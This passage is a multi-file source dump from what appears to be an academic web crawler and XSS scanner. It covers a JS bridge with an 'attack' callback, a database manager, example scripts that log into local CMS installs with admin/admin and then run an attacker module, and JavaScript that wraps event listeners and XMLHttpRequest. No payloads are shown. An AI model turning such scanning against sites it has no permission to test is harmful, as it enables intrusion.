self.domain_handler.complete_urls_in_page(result) 182 | self.domain_handler.analyze_urls(result) 183 | self.async_request_handler.handle_requests(result) 184 | return result 185 | 186 | def _check_login_status_with_cookies(self): 187 | if self.cookie_num > 0: 188 | current_cookie_num = count_cookies(self._network_access_manager, self.user.url_with_login_form) 189 | return current_cookie_num >= self.cookie_num 190 | return True 191 | -------------------------------------------------------------------------------- /crawler/core/jsbridge.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | import json 19 | from PyQt5.QtCore import QObject, pyqtSlot 20 | 21 | __author__ = 'constantin' 22 | 23 | class JsBridge(QObject): 24 | 25 | def __init__(self, analyzer): 26 | QObject.__init__(self) 27 | self.analyzer = analyzer 28 | self._ajax_request = [] 29 | 30 | @pyqtSlot(str) 31 | def add_eventListener_to_element(self, msg): 32 | msg = json.loads(msg) 33 | self.analyzer.add_eventlistener_to_element(msg) 34 | 35 | @pyqtSlot(str) 36 | def xmlHTTPRequestOpen(self, msg): 37 | msg = json.loads(msg) 38 | self._ajax_request.append(msg) 39 | 40 | @pyqtSlot(str) 41 | def xmlHTTPRequestSend(self, msg): 42 | msg = json.loads(msg) 43 | according_open = self._ajax_request.pop(0) 44 | try: 45 | according_open['parameters'] = msg['parameters'][0] 46 | except IndexError: 47 | according_open['parameters'] = "" 48 | self.analyzer.capturing_requests(according_open) 49 | 50 | @pyqtSlot(str) 51 | def timeout(self, msg): 52 | msg = json.loads(msg) 53 | msg['type'] = "timeout" 54 | self.analyzer.capture_timeout_call(msg) 55 | 56 | @pyqtSlot(str) 57 | def intervall(self, msg): 58 | msg = json.loads(msg) 59 | msg['type'] = "intervall" 60 | #logging.debug(msg) 61 | self.analyzer.capture_timeout_call(msg) 62 | 63 | @pyqtSlot(str) 64 | def add_eventlistener_to_element(self, msg): 65 | msg = json.loads(msg) 66 | #logging.debug(msg) 67 | self.analyzer.add_eventlistener_to_element(msg) 68 | 69 | @pyqtSlot(str) 70 | def attack(self, msg): 71 | self.analyzer.xss_callback(msg) -------------------------------------------------------------------------------- /crawler/database/__init__.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | -------------------------------------------------------------------------------- /crawler/database/databasemanager.py: -------------------------------------------------------------------------------- 1 | """ 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | 17 | This Class is responsible for storage related things 18 | 19 | """ 20 | from database.database import Database 21 | from models.clickabletype import ClickableType 22 | 23 | 24 | class DatabaseManager(object): 25 | 26 | def __init__(self, user, dropping=True): 27 | self._database = Database(user.username, dropping) 28 | self._database.insert_user_into_db(user) 29 | self._web_page_cache = [] 30 | self._deltapage_cache = [] 31 | self._current_session = None 32 | self.MAX_CACHE_SIZE = 0 33 | self._current_session = user.session 34 | 35 | def return_session_id_to_username(self, username): 36 | return self._database.get_user_to_username(username) 37 | 38 | def store_web_page(self, web_page): 39 | if self.MAX_CACHE_SIZE > 0: 40 | if len(self._web_page_cache) + 1 > self.MAX_CACHE_SIZE: 41 | del self._web_page_cache[-1] 42 | self._web_page_cache.insert(0, web_page) 43 | self._database.insert_page_into_db(self._current_session, web_page) 44 | 45 | def get_page_to_id(self, page_id): 46 | page = self.get_web_page_to_id(page_id) 47 | if page is not None: 48 | return page 49 | page = self.get_delta_page_to_id(page_id) 50 | if page is not None: 51 | return page 52 | return None 53 | 54 | def store_delta_page(self, delta_page): 55 | if self.MAX_CACHE_SIZE > 0: 56 | if len(self._deltapage_cache) +1 > self.MAX_CACHE_SIZE: 57 | del self._deltapage_cache[-1] 58 | self._deltapage_cache.insert(0, delta_page) 59 | self._database.insert_delta_page_into_db(self._current_session, delta_page) 60 | 61 | def get_page_to_url(self, url): 62 | try: 63 | url = url.toString() 64 | except AttributeError: 65 | url = url 66 | 67 | return self._database.get_webpage_to_url_from_db(self._current_session, url) 68 | 69 | def get_web_page_to_id(self, page_id): 70 | for page in self._web_page_cache: 71 | if page_id == page.id: 72 | return page 73 | return self._database.get_webpage_to_id_from_db(self._current_session, page_id) 74 | 75 | 76 | def get_delta_page_to_id(self, delta_page_id): 77 | for page in self._deltapage_cache: 78 | if delta_page_id == page.id: 79 | return page 80 | 81 | return self._database.get_delta_page_to_id(self._current_session, delta_page_id) 82 | 83 | def url_exists(self, url): 84 | return self._database.url_exists(self._current_session, url) 85 | 86 | def get_next_url_for_crawling(self): 87 | return self._database.get_next_url_for_crawling(self._current_session) 88 | 89 | def get_all_unvisited_urls_sorted_by_hash(self): 90 | return self._database.get_all_unvisited_urls_sorted_by_hash(self._current_session) 91 | 92 | def insert_url_into_db(self, url): 93 | return self._database.insert_url_into_db(self._current_session, url) 94 | 95 | def insert_redirected_url(self, url): 96 | return self._database.insert_url_into_db(self._current_session, url, is_redirected_url=True) 97 | 98 | def visit_url(self, url, webpage_id, response_code, redirected_to = None): 99 | self._database.visit_url(self._current_session, url, webpage_id, response_code, redirected_to) 100 | 101 | def extend_ajax_requests_to_webpage(self, webpage, ajax_reuqests): 102 | self._database.extend_ajax_requests_to_webpage(self._current_session, webpage, ajax_reuqests) 103 | 104 | 105 | def get_all_crawled_delta_pages(self, url=None): 106 | return self._database.get_all_crawled_deltapages_to_url_from_db(self._current_session, url) 107 | 108 | 109 | def update_clickable(self, web_page_id, clickable): 110 | if clickable.clickable_type == ClickableType.IgnoredByCrawler or clickable.clickable_type == ClickableType.UnsupportedEvent: 111 | self._database.set_clickable_ignored(self._current_session, web_page_id, clickable.dom_address, clickable.event, clickable.clickable_depth, clickable.clickable_type) 112 | else: 113 | self._database.set_clickable_clicked(self._current_session, web_page_id, clickable.dom_address, clickable.event, clickable.clickable_depth, clickable.clickable_type, clickable.links_to) 114 | 115 | def get_url_structure(self, hash): 116 | return self._database.get_url_structure_from_db(self._current_session, hash) 117 | 118 | def insert_url_structure(self, url_description): 119 | self._database.insert_url_structure_into_db(self._current_session, url_description) 120 | 121 | def get_all_pages(self): 122 | return self._database.get_all_pages(self._current_session) 123 | 124 | def get_url_structure_to_hash(self, url_hash): 125 | return self._database.get_url_structure_from_db(self._current_session,url_hash) 126 | 127 | def insert_url_structure_into_db(self, url_description): 128 | self._database.insert_url_structure_into_db(self._current_session, url_description) 129 | 130 | def get_url_to_id(self, id): 131 | return self._database.get_url_to_id(self._current_session, id) 132 | 133 | def write_clusters(self, url_hash, clusters): 134 | self._database.write_cluster(self._current_session, url_hash, clusters) 135 | 136 | def get_clusters(self, url_hash): 137 | return self._database.get_clusters(self._current_session, url_hash) 138 | 139 | def count_visited_url_per_hash(self, url_hash): 140 | return self._database.count_visited_urls_per_hash(self._current_session, url_hash) 141 | 142 | def get_all_url_structures(self): 143 | return self._database.get_all_url_structures(self._current_session) 144 | 145 | def get_all_visited_urls(self): 146 | return self._database.get_all_successfully_visited_urls(self._current_session) 147 | 148 | def get_one_visited_url_per_structure(self): 149 | return self._database.get_one_visited_url_per_structure(self._current_session) 150 | 151 | def insert_attack_result(self, result, attack_url): 152 | self._database.insert_attack_result(self._current_session, result, attack_url) 153 | 154 | def get_asyncrequest_structure(self, structure_hash=None): 155 | return self._database.get_asyncrequest_structure(self._current_session, structure_hash) 156 | 157 | def get_all_get_forms(self): 158 | return self._database.get_all_get_forms(self._current_session) 159 | 160 | def get_one_form_per_destination(self): 161 | return self._database.get_one_form_per_destination(self._current_session) 162 | 163 | def num_of_ignored_urls(self, url_hash): 164 | return self._database.num_of_ignored_urls(self._current_session, url_hash) 165 | 166 | def url_visited(self, url): 167 | return self._database.url_visited(self._current_session, url) 168 | 169 | def get_id_to_url(self, url): 170 | return self._database.get_id_to_url(self._current_session, url) 171 | 172 | def get_all_urls_to_domain(self, domain): 173 | return self._database.get_all_urls_to_domain(self._current_session, domain) -------------------------------------------------------------------------------- /crawler/example.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | import logging 19 | 20 | from attacker import Attacker 21 | from crawler import Crawler 22 | from database.databasemanager import DatabaseManager 23 | from utils.config import CrawlConfig, AttackConfig 24 | from models.utils import CrawlSpeed 25 | from utils.user import User 26 | import csv 27 | from utils.utils import calculate_similarity_between_pages 28 | 29 | logging.basicConfig(level=logging.DEBUG, 30 | format='%(asctime)s: %(levelname)s - %(message)s', 31 | #filename='Attack.log', 32 | #filemode='w' 33 | ) 34 | 35 | if __name__ == '__main__': 36 | logging.info("Crawler started...") 37 | 38 | # This is for example to crawl a wordpress installation as logged in user 39 | user = User("Wordpress", 0, "http://localhost:8080/wp-login.php", login_data = {"log": "admin", "pwd": "admin"}, session="ABC") 40 | 41 | url = "http://localhost/" 42 | 43 | # This is the confuigrtion I used for the experiments 44 | crawler_config = CrawlConfig("jÄk", url, max_depth=3, max_click_depth=3, crawl_speed=CrawlSpeed.Fast) 45 | attack_config = AttackConfig(url) 46 | 47 | database_manager = DatabaseManager(user, dropping=True) 48 | # Uncomment out the end of the next line to use a proxy 49 | crawler = Crawler(crawl_config=crawler_config, database_manager=database_manager)#, proxy="localhost", port=8082) 50 | crawler.crawl(user) 51 | logging.info("Crawler finished") 52 | 53 | logging.info("Start attacking...") 54 | attacker = Attacker(attack_config, database_manager=database_manager)#, proxy="localhost", port=8082) 55 | attacker.attack(user) 56 | logging.info("Finish attacking...") -------------------------------------------------------------------------------- /crawler/experiments_paper.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | 17 | Created on 12.11.2014 18 | 19 | @author: constantin 20 | ''' 21 | import logging 22 | 23 | from attacker import Attacker 24 | from crawler import Crawler 25 | from database.databasemanager import DatabaseManager 26 | from utils.config import CrawlConfig, AttackConfig 27 | from models.utils import CrawlSpeed 28 | from utils.user import User 29 | import csv 30 | from utils.utils import calculate_similarity_between_pages 31 | 32 | logging.basicConfig(level=logging.DEBUG, 33 | format='%(asctime)s: %(levelname)s - %(message)s', 34 | #datefmt='%d.%m.%Y %H:%M:%S.%f', 35 | #filename='Attack.log', 36 | #filemode='w' 37 | ) 38 | 39 | if __name__ == '__main__': 40 | logging.info("Crawler started...") 41 | 42 | #user = User("WordpressX", 0, "http://localhost:8080/wp-login.php", login_data = {"log": "admin", "pwd": "admin"}, session="ABC") 43 | #user = User("constantin", 0, "http://localhost:8080/", login_data = {"username" : "admin", "pass" : "admin"}) 44 | user = User("Test42", 0, "http://localhost:8080/", login_data = {"user": "admin", "password": "admin"}, session="ABC") 45 | #user = User("constantin", 0, "http://localhost:8080/", login_data = {"username": "admin", "password": "admin"}) 46 | #user = User("Gallery2", 0, "http://localhost:8080/", login_data= {"name": "admin", "password": "34edbc"}, session= "ABC") 47 | #user = User("Gallery41", 0, session="ABC") 48 | #user = User("PHPbb64", 0, "http://localhost:8080/phpbb/ucp.php?mode=login", login_data = {"username": "admin", "password": "adminadmin"}, session= "ABC") 49 | #user = User("Joomla", 0, "http://localhost:8080/", login_data = {"username": "admin", "password": "admin"}, session= "ABC") 50 | #user = User("ModX", 0 , "http://localhost:8080/manager/", login_data= {"username": "admin", "password": "adminadmin"}, session="ABC") 51 | #user = User("Pimcore", 0, "http://localhost:8080/admin/login/", login_data={"username": "admin", "password": "admin"}, session="ABC") 52 | #user = User("Piwigo", 0, "http://localhost:8080/", login_data={"username": "admin", "password": "admin"}, session="ABC") 53 | #user = User("Concret5", 0, "http://localhost:8080/index.php/login", login_data={"uName": "admin", "uPassword": "admin"}) 54 | #user = User("Mediawiki", 0) 55 | #user = User("MyBB2", 0, "http://localhost:8080/index.php", login_data= {"quick_username": "admin", "quick_password": "admin"}, session="ABC") 56 | #user = User("MyBB2", 0, "http://localhost:8080/admin/index.php", login_data= {"username": "admin", "password": "admin"}, session="ABC") 57 | #user = User("local", 0) 58 | 59 | url = "http://localhost:8080/" 60 | crawler_config = CrawlConfig("Database Name", url, max_depth=2, max_click_depth=5, crawl_speed=CrawlSpeed.Fast) 61 | attack_config = AttackConfig(url) 62 | 63 | database_manager = DatabaseManager(user, dropping=True) 64 | crawler = Crawler(crawl_config=crawler_config, database_manager=database_manager)#, proxy="localhost", port=8082) 65 | crawler.crawl(user) 66 | # TODO: It seems to be that, there is an error if we instanciate crawler and attacker and then call the crawl function. Maybe use one global app! 67 | logging.info("Crawler finished") 68 | logging.info("Start attacking...") 69 | #attacker = Attacker(attack_config, database_manager=database_manager)#, proxy="localhost", port=8082) 70 | #attacker.attack(user) 71 | logging.info("Finish attacking...") 72 | -------------------------------------------------------------------------------- /crawler/js/addeventlistener_wrapper.js: -------------------------------------------------------------------------------- 1 | /* 2 | *Copyright (C) 2015 Constantin Tschuertz 3 | * 4 | * This program is free software: you can redistribute it and/or modify 5 | * it under the terms of the GNU General Public License as published by 6 | * the Free Software Foundation, either version 3 of the License, or 7 | * any later version. 8 | * 9 | *This program is distributed in the hope that it will be useful, 10 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | * GNU General Public License for more details. 13 | * 14 | * You should have received a copy of the GNU General Public License 15 | * along with this program. If not, see . 16 | */ 17 | 18 | 19 | // This JS-Script wrapps the addEventListener-Function, that is used by JQuery 20 | callbackWrap(Element.prototype, "addEventListener", 1, addEventListenerWrapper); 21 | callbackWrap(Document.prototype, "addEventListener", 1, 22 | bodyAddEventListenerWrapper); -------------------------------------------------------------------------------- /crawler/js/ajax_interceptor.js: -------------------------------------------------------------------------------- 1 | /* 2 | *Copyright (C) 2015 Constantin Tschuertz 3 | * 4 | * This program is free software: you can redistribute it and/or modify 5 | * it under the terms of the GNU General Public License as published by 6 | * the Free Software Foundation, either version 3 of the License, or 7 | * any later version. 8 | * 9 | *This program is distributed in the hope that it will be useful, 10 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | * GNU General Public License for more details. 13 | * 14 | * You should have received a copy of the GNU General Public License 15 | * along with this program. If not, see . 16 | */ 17 | 18 | // This js wrapps the open function from XMLHttpRequest 19 | callbackWrap(XMLHttpRequest.prototype, 'open', 0, XMLHTTPObserverOpen); 20 | callInterceptionWrapper(XMLHttpRequest.prototype, 'send', 0, XMLHTTPObserverSend); -------------------------------------------------------------------------------- /crawler/js/ajax_observer.js: -------------------------------------------------------------------------------- 1 | /* 2 | *Copyright (C) 2015 Constantin Tschuertz 3 | * 4 | * This program is free software: you can redistribute it and/or modify 5 | * it under the terms of the GNU General Public License as published by 6 | * the Free Software Foundation, either version 3 of the License, or 7 | * any later version. 8 | * 9 | *This program is distributed in the hope that it will be useful, 10 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | * GNU General Public License for more details. 13 | * 14 | * You should have received a copy of the GNU General Public License 15 | * along with this program. If not, see . 16 | */ 17 | 18 | // This js wrapps the open function from XMLHttpRequest 19 | callbackWrap(XMLHttpRequest.prototype, 'open', 0, XMLHTTPObserverOpen); 20 | callbackWrap(XMLHttpRequest.prototype, 'send', 0, XMLHTTPObserverSend); -------------------------------------------------------------------------------- /crawler/js/lib.js: -------------------------------------------------------------------------------- 1 | /* 2 | * Simulate.js from https://github.com/airportyh/simulate.js 3 | */ 4 | !function() { 5 | function extend(dst, src) { 6 | for ( var key in src) 7 | dst[key] = src[key] 8 | return src 9 | } 10 | var Simulate = { 11 | event : function(element, eventName) { 12 | if (document.createEvent) { 13 | var evt = document.createEvent("HTMLEvents") 14 | evt.initEvent(eventName, true, true) 15 | element.dispatchEvent(evt) 16 | } else { 17 | var evt = document.createEventObject() 18 | element.fireEvent('on' + eventName, evt) 19 | } 20 | }, 21 | keyEvent : function(element, type, options) { 22 | var evt, e = { 23 | bubbles : true, 24 | cancelable : true, 25 | view : window, 26 | ctrlKey : false, 27 | altKey : false, 28 | shiftKey : false, 29 | metaKey : false, 30 | keyCode : 0, 31 | charCode : 0 32 | } 33 | extend(e, options) 34 | if (document.createEvent) { 35 | try { 36 | evt = document.createEvent('KeyEvents') 37 | evt.initKeyEvent(type, e.bubbles, e.cancelable, e.view, 38 | e.ctrlKey, e.altKey, e.shiftKey, e.metaKey, 39 | e.keyCode, e.charCode) 40 | element.dispatchEvent(evt) 41 | } catch (err) { 42 | evt = document.createEvent("Events") 43 | evt.initEvent(type, e.bubbles, e.cancelable) 44 | extend(evt, { 45 | view : e.view, 46 | ctrlKey : e.ctrlKey, 47 | altKey : e.altKey, 48 | shiftKey : e.shiftKey, 49 | metaKey : e.metaKey, 50 | keyCode : e.keyCode, 51 | charCode : e.charCode 52 | }) 53 | element.dispatchEvent(evt) 54 | } 55 | } 56 | } 57 | } 58 | Simulate.keypress = function(element, chr) { 59 | var charCode = chr.charCodeAt(0) 60 | this.keyEvent(element, 'keypress', { 61 | keyCode : charCode, 62 | charCode : charCode 63 | }) 64 | } 65 | Simulate.keydown = function(element, chr) { 66 | var charCode = chr.charCodeAt(0) 67 | this.keyEvent(element, 'keydown', { 68 | keyCode : charCode, 69 | charCode : charCode 70 | }) 71 | } 72 | Simulate.keyup = function(element, chr) { 73 | var charCode = chr.charCodeAt(0) 74 | this.keyEvent(element, 'keyup', { 75 | keyCode : charCode, 76 | charCode : charCode 77 | }) 78 | } 79 | Simulate.change = function(element) { 80 | var evt = document.createEvent("HTMLEvents"); 81 | evt.initEvent("change", false, true); 82 | element.dispatchEvent(evt); 83 | 84 | } 85 | //Simulate.click = function(element){ 86 | // element.click(); 87 | //} 88 | var events = ['click','focus', 'blur', 'dblclick', 'input', 'mousedown', 89 | 'mousemove', 'mouseout', 'mouseover', 'mouseup', 'resize', 90 | 'scroll', 'select', 'submit', 'load', 'unload', 'mouseleave' ] 91 | for (var i = events.length; i--;) { 92 | var event = events[i] 93 | Simulate[event] = (function(evt) { 94 | return function(element) { 95 | this.event(element, evt) 96 | } 97 | }(event)) 98 | } 99 | if (typeof module !== 'undefined') { 100 | module.exports = Simulate 101 | } else if (typeof window !== 'undefined') { 102 | window.Simulate = Simulate 103 | } else if (typeof define !== 'undefined') { 104 | define(function() { 105 | return Simulate 106 | }) 107 | } 108 | }(); 109 | /* 110 | * From down here 111 | * 112 | *Copyright (C) 2015 Constantin Tschuertz 113 | * 114 | * This program is free software: you can redistribute it and/or modify 115 | * it under the terms of the GNU General Public License as published by 116 | * the Free Software Foundation, either version 3 of the License, or 117 | * any later version. 118 | * 119 | *This program is distributed in the hope that it will be useful, 120 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 121 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 122 | * GNU General Public License for more details. 123 | * 124 | * You should have received a copy of the GNU General Public License 125 | * along with this program. If not, see . 126 | * 127 | */ 128 | 129 | 130 | function callbackWrap(object, property, argumentIndex, wrapperFactory) { 131 | var original = object[property]; 132 | object[property] = function() { 133 | wrapperFactory(this, arguments); 134 | return original.apply(this, arguments); 135 | } 136 | return original; 137 | } 138 | 139 | var max_waiting_time = 65000 140 | var min_waiting_time = 0 141 | 142 | function timingCallbackWrap(object, property, argumentIndex, wrapperFactory) { 143 | var original = object[property]; 144 | 145 | object[property] = function() { 146 | if (arguments[1] > max_waiting_time) { 147 | arguments[1] = max_waiting_time 148 | } 149 | wrapperFactory(this, arguments); 150 | return original.apply(this, arguments); 151 | } 152 | return original; 153 | } 154 | 155 | function callInterceptionWrapper(object, property, argumentIndex, 156 | wrapperFactory) { 157 | var original = object[property]; 158 | object[property] = function() { 159 | wrapperFactory(this, arguments); 160 | return null; 161 | } 162 | return original; 163 | } 164 | 165 | function XMLHTTPObserverOpen(elem, args) { 166 | resp = { 167 | "url" : args[1], 168 | "method" : args[0] 169 | }; 170 | random_num = Math.floor((Math.random() * 10000) + 1); 171 | //console.log("Uniq Id set: " + random_num); 172 | elem.jaeks_id = random_num; 173 | resp = JSON.stringify(resp); 174 | jswrapper.xmlHTTPRequestOpen(resp) 175 | } 176 | 177 | function XMLHTTPObserverSend(elem, args) { 178 | elems = [] 179 | for (i = 0; i < args.length; i++) { 180 | elems.push(args[i]) 181 | } 182 | resp = { 183 | "parameters" : elems 184 | }; 185 | //console.log("Uniq Id: " + elem.jaeks_id); 186 | resp = JSON.stringify(resp) 187 | jswrapper.xmlHTTPRequestSend(resp) 188 | } 189 | 190 | function timeoutWrapper(elem, args) { 191 | function_id = MD5(args[0].toString()); 192 | resp = { 193 | "function_id" : function_id, 194 | "time" : args[1] 195 | }; 196 | resp = JSON.stringify(resp) 197 | jswrapper.timeout(resp) 198 | } 199 | 200 | function intervallWrapper(elem, args) { 201 | function_id = MD5(args[0].toString()); 202 | resp = { 203 | "function_id" : function_id, 204 | "time" : args[1] 205 | }; 206 | resp = JSON.stringify(resp) 207 | jswrapper.intervall(resp) 208 | } 209 | 210 | function getXPath(element) { 211 | try { 212 | var xpath = ''; 213 | for (; element && element.nodeType == 1; element = element.parentNode) { 214 | var sibblings = element.parentNode.childNodes; 215 | var same_tags = [] 216 | for (var i = 0; i < sibblings.length; i++) { // collecting same 217 | if (element.tagName === sibblings[i].tagName) { 218 | same_tags[same_tags.length] = sibblings[i] 219 | } 220 | } 221 | 222 | var id = same_tags.indexOf(element) + 1; 223 | id > 1 ? (id = '[' + id + ']') : (id = ''); 224 | xpath = '/' + element.tagName.toLowerCase() + id + xpath; 225 | } 226 | return xpath; 227 | } catch (e) { 228 | console.log("Error: " + e) 229 | return ""; 230 | } 231 | } 232 | 233 | function addEventListenerWrapper(elem, args) { 234 | tag = elem.tagName 235 | dom_adress = ""; 236 | id = elem.id; 237 | html_class = elem.className; 238 | //console.log("AddEventLIstenerWrapper: " + tag + " - Event: " + args[0]) 239 | dom_adress = getXPath(elem); 240 | if (dom_adress.indexOf("/html/body") == -1) { 241 | console.log("Domadress is not valid: " + dom_adress) 242 | return 243 | } 244 | function_id = MD5(args[1].toString()) 245 | resp = { 246 | "event" : args[0], 247 | "function_id" : function_id, 248 | "addr" : dom_adress, 249 | "id" : id, 250 | "tag" : tag, 251 | "class" : html_class 252 | } 253 | //console.log(resp) 254 | resp = JSON.stringify(resp) 255 | jswrapper.add_eventListener_to_element(resp) 256 | if (args[0] == "change") { 257 | inputs = elem.querySelectorAll("input"); 258 | selects = elem.querySelectorAll("select"); 259 | options = elem.querySelectorAll("option"); 260 | 261 | for (i = 0; i < inputs.length; i++) { 262 | e = inputs[i]; 263 | if (e.getAttribute("type") == "radio" 264 | || e.getAttribute("type") == "checkbox") { 265 | tag = e.tagName 266 | id = e.id; 267 | html_class = e.className; 268 | dom_adress = getXPath(e); 269 | function_id = ""; 270 | resp = { 271 | "event" : "change", 272 | "function_id" : function_id, 273 | "addr" : dom_adress, 274 | "id" : id, 275 | "tag" : tag, 276 | "class" : html_class 277 | } 278 | resp = JSON.stringify(resp) 279 | jswrapper.add_eventListener_to_element(resp) 280 | } 281 | } 282 | for (i = 0; i < selects.length; i++) { 283 | s = selects[i]; 284 | tag = s.tagName 285 | id = s.id; 286 | html_class = s.className; 287 | dom_adress = getXPath(s); 288 | function_id = ""; 289 | resp = { 290 | "event" : "change", 291 | "function_id" : function_id, 292 | "addr" : dom_adress, 293 | "id" : id, 294 | "tag" : tag, 295 | "class" : html_class 296 | } 297 | resp = JSON.stringify(resp) 298 | jswrapper.add_eventListener_to_element(resp) 299 | } 300 | for (xx = 0; xx < options.length; xx++) { 301 | element = options[i] 302 | tag = element.tagName 303 | id = element.id; 304 | html_class = element.className; 305 | dom_adress = getXPath(element); 306 | function_id = ""; 307 | resp = { 308 | "event" : "change", 309 | "function_id" : function_id, 310 | "addr" : dom_adress, 311 | "id" : id, 312 | "tag" : tag, 313 | "class" : html_class 314 | } 315 | resp = JSON.stringify(resp) 316 | jswrapper.add_eventListener_to_element(resp) 317 | } 318 | } 319 | if (tag == "TABLE" && args[0] == "click"){ 320 | candidates = elem.querySelectorAll("button"); 321 | for( xx = 0; xx < candidates.length; xx++) { 322 | var element = candidates[xx]; 323 | tag = element.tagName; 324 | id = element.id; 325 | html_class = element.className; 326 | dom_adress = getXPath(element); 327 | function_id = ""; 328 | resp = { 329 | "event": "click", 330 | "function_id": function_id, 331 | "addr": dom_adress, 332 | "id": id, 333 | "tag": tag, 334 | "class": html_class 335 | }; 336 | resp = JSON.stringify(resp); 337 | //console.log("Hello " + resp) 338 | //console.log(element.click) 339 | jswrapper.add_eventListener_to_element(resp); 340 | }; 341 | } 342 | } 343 | 344 | function bodyAddEventListenerWrapper(elem, args) { 345 | tag = "body" 346 | dom_adress = ""; 347 | id = elem.id; 348 | html_class = elem.className; 349 | function_id = MD5(args[1].toString()) 350 | dom_adress = "/html/body" 351 | resp = { 352 | "event" : args[0], 353 | "function_id" : function_id, 354 | "addr" : dom_adress, 355 | "id" : id, 356 | "tag" : tag, 357 | "class" : html_class 358 | } 359 | resp = JSON.stringify(resp) 360 | jswrapper.add_eventListener_to_element(resp) 361 | 362 | } 363 | 364 | -------------------------------------------------------------------------------- /crawler/js/property_obs.js: -------------------------------------------------------------------------------- 1 | /* 2 | *Copyright (C) 2015 Constantin Tschuertz 3 | * 4 | * This program is free software: you can redistribute it and/or modify 5 | * it under the terms of the GNU General Public License as published by 6 | * the Free Software Foundation, either version 3 of the License, or 7 | * any later version. 8 | * 9 | *This program is distributed in the hope that it will be useful, 10 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | * GNU General Public License for more details. 13 | * 14 | * You should have received a copy of the GNU General Public License 15 | * along with this program. If not, see . 16 | */ 17 | 18 | 19 | function catch_properties(){ 20 | var elems = document.getElementsByTagName('*') 21 | // console.log(elems.length + " elems found...") 22 | for (my_counter_i = 0; my_counter_i < elems.length; my_counter_i++) { 23 | events = [] 24 | tag = elems[my_counter_i].tagName 25 | dom_address = "" 26 | id = elems[my_counter_i].id 27 | if (elems[my_counter_i].onclick != null) { 28 | events.push({"method": "onclick", "func": elems[my_counter_i].onclick}) 29 | } 30 | if (elems[my_counter_i].onmouseover != null) { 31 | events.push({"method": "onmouseover", "func": elems[my_counter_i].onmouseover}) 32 | } 33 | if (elems[my_counter_i].onabort != null) { 34 | events.push({"method": "onabort", "func": elems[my_counter_i].onabort}) 35 | } 36 | if (elems[my_counter_i].onblur != null) { 37 | events.push({"method": "onblur", "func": elems[my_counter_i].onblur}) 38 | } 39 | if (elems[my_counter_i].onchange != null) { 40 | events.push({"method": "onchange", "func": elems[my_counter_i].onchange}) 41 | } 42 | if (elems[my_counter_i].onblclick != null) { 43 | events.push({"method": "onblclick", "func": elems[my_counter_i].onblclick}) 44 | } 45 | if (elems[my_counter_i].onerror != null) { 46 | events.push({"method": "onerror", "func": elems[my_counter_i].onerror}) 47 | } 48 | if (elems[my_counter_i].onfocus != null) { 49 | events.push({"method": "onfocus", "func": elems[my_counter_i].onfocus}) 50 | } 51 | if (elems[my_counter_i].onkeydown != null) { 52 | events.push({"method": "onkeydown", "func": elems[my_counter_i].onkeydown}) 53 | } 54 | if (elems[my_counter_i].onkeypress != null) { 55 | events.push({"method": "onkeypress", "func": elems[my_counter_i].onkeypress}) 56 | } 57 | if (elems[my_counter_i].onkeyup != null) { 58 | events.push({"method": "onkeyup", "func": elems[my_counter_i].onkeyup}) 59 | } 60 | if (elems[my_counter_i].onmousedown != null) { 61 | events.push({"method": "onmousedown", "func": 